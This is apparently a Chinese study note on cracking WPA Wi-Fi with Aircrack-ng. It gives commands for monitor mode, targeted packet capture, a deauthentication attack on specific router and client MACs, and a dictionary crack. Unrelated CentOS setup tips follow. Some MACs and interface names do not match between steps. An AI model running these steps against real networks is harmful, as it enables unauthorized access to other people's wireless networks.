Aircrack-ng学习使用

Aircrack-ng

Aircrack-ng是一款经典的wifi破解工具，本着对网络安全的学习，熟悉本工具的使用流程。

Install

sudo apt-get install aircrack-ng


ifconfig  #cat wireless net card name

Monitor mode

$ ifconfig

wlo1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.0.145  netmask 255.255.255.0  broadcast 192.168.0.255
        inet6 fe80::fde:f9f7:aa85:7a8  prefixlen 64  scopeid 0x20<link>
        ether d4:25:8b:4e:e7:29  txqueuelen 1000  (Ethernet)
        RX packets 24936  bytes 18477382 (18.4 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 20360  bytes 4099659 (4.0 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0


$ sudo airmon-ng start wlo1

Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'

  PID Name
 1069 avahi-daemon
 1081 avahi-daemon
 1085 wpa_supplicant
 1091 NetworkManager
 4967 dhclient

PHY	Interface	Driver		Chipset

phy0	wlo1		iwlwifi		Intel Corporation Wireless 7265 (rev 59)

Err solution

方案1：

$ sudo airmon-ng check kill

Killing these processes:

  PID Name
 1085 wpa_supplicant
 7147 avahi-daemon
 7148 avahi-daemon

方案2：

SIOCSIFFLAGS: Operation not possible due to RF-kill

sudo rfkill list all
sudo rfkill unblock wifi

解决完Error后重新sudo airmon-ng start wlo1

ifconfig看到产生一个mon的虚拟网卡就是monitor模式开启成功！

wlo1mon: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        unspec D4-25-8B-4E-11-11-11-11-00-00-00-00-00-00-00-00  txqueuelen 1000  (UNSPEC)
        RX packets 43  bytes 6749 (6.7 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

airodump-ng

help 文档：

airodump-ng --help

  Airodump-ng 1.2 rc4 - (C) 2006-2015 Thomas d'Otreppe
  http://www.aircrack-ng.org

  usage: airodump-ng <options> <interface>[,<interface>,...]

  Options:
      --ivs                 : Save only captured IVs
      --gpsd                : Use GPSd
      --write      <prefix> : Dump file prefix
      -w                    : same as --write
      --beacons             : Record all beacons in dump file
      --update       <secs> : Display update delay in seconds
      --showack             : Prints ack/cts/rts statistics
      -h                    : Hides known stations for --showack
      -f            <msecs> : Time in ms between hopping channels
      --berlin       <secs> : Time before removing the AP/client
                              from the screen when no more packets
                              are received (Default: 120 seconds)
      -r             <file> : Read packets from that file
      -x            <msecs> : Active Scanning Simulation
      --manufacturer        : Display manufacturer from IEEE OUI list
      --uptime              : Display AP Uptime from Beacon Timestamp
      --wps                 : Display WPS information (if any)
      --output-format
                  <formats> : Output format. Possible values:
                              pcap, ivs, csv, gps, kismet, netxml
      --ignore-negative-one : Removes the message that says
                              fixed channel <interface>: -1
      --write-interval
                  <seconds> : Output file(s) write interval in seconds

  Filter options:
      --encrypt   <suite>   : Filter APs by cipher suite
      --netmask <netmask>   : Filter APs by mask
      --bssid     <bssid>   : Filter APs by BSSID
      --essid     <essid>   : Filter APs by ESSID
      --essid-regex <regex> : Filter APs by ESSID using a regular
                              expression
      -a                    : Filter unassociated clients

  By default, airodump-ng hop on 2.4GHz channels.
  You can make it capture on other/specific channel(s) by using:
      --channel <channels>  : Capture on specific channels
      --band <abg>          : Band on which airodump-ng should hop
      -C    <frequencies>   : Uses these frequencies in MHz to hop
      --cswitch  <method>   : Set channel switching method
                    0       : FIFO (default)
                    1       : Round Robin
                    2       : Hop on last
      -s                    : same as --cswitch

      --help                : Displays this usage screen

扫描周围的wifi：

sudo airodump-ng -a --encrypt WPA wlo1mon

抓包

使用airodump-ng这个工具进行抓包

--bssid 是路由器的mac地址
-w 是写入到文件longas中
-c 11 是频道11
--ivs 是只抓取可用于破解的IVS数据报文

---

sudo airodump-ng --ivs --bssid FC:D7:33:3F:BC:F8 –w longas.cap -c 11 wlo1mon

攻击

我们已经看到了要攻击的路由器的mac地址和其中的客户端的mac地址，还有工作频道。执行：

发送流量:

sudo aireplay-ng -0 10 -a FE:D7:33:58:90:9F -c  68:3E:34:CE:F3:83 mon8

恢复网卡

sudo airmon-ng stop wlo1mon
sudo NetworkManager

aircrack-ng破解

sudo aircrack-ng longas.cap -w /home/sweet/1.txt

虚拟机跑包（Centos7）

http://softwaretester.info/aircrack-ng-and-centos-7/

# add epel repository
$ yum install -y epel-release

# install needed software
$ yum install -y git-svn libpcap-devel sqlite-devel gcc gcc-c++ libnl-devel openssl-devel usbutils pciutils rfkill

# get latests version (my was Aircrack-ng 1.2 rc3 r2799)
$ svn co http://svn.aircrack-ng.org/trunk/ aircrack-ng

# Compiling
$ cd aircrack-ng/
$ make install clean

Screen

yum install screen

screen -ls
screen -r 10157
Ctrl+a+d #exit

RAR&7ZIP

wget http://www.rarlab.com/rar/rarlinux-3.8.0.tar.gz
tar -zxvf rarlinux-3.8.0.tar.gz
cd rar
su root
make
make install
exit

运行命令rar时,出现下面这个问题

rar: /lib/i686/nosegneg/libc.so.6: version `GLIBC_2.7' not found (required byrar)

解决办法：

cp rar_static /usr/local/bin/rar

rar x passwd.rar  //解压 passwd.rar 到当前目录

sudo yum install epel-release
sudo yum install p7zip
7za x file.7z
7za x -o/tmp file.7z

Centos7中文乱码

vim /etc/locale.conf
  LANG="zh_CN.GB18030"
  LANGUAGE="zh_CN.GB18030:zh_CN.GB2312:zh_CN"
  SUPPORTED="zh_CN.UTF-8:zh_CN:zh:en_US.UTF-8:en_US:en"
  SYSFONT="lat0-sun16"

每天进步一点点!!!!

impossible is I’m possible!!!